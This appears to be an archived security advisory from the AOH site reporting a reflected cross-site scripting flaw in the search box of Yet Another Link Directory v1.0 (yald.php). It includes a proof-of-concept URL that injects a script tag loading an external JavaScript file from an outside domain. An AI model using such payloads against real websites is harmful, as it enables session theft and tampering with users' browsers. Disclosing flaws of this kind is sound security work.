AOH :: HP Unsorted Y :: C07-1693.HTM

Yet Another Link Directory v1.0



Yet Another Link Directory v1.0
Yet Another Link Directory v1.0



Yet Another Link Directory v1.0
http://yald.sourceforge.net/ 

Effected files:
yald.php

---------------------------
yald.php search box XSS

User input isn't sanatized before being generated. In the search box for a PoC put:
 

url:
http://example.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E 

- Luny

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.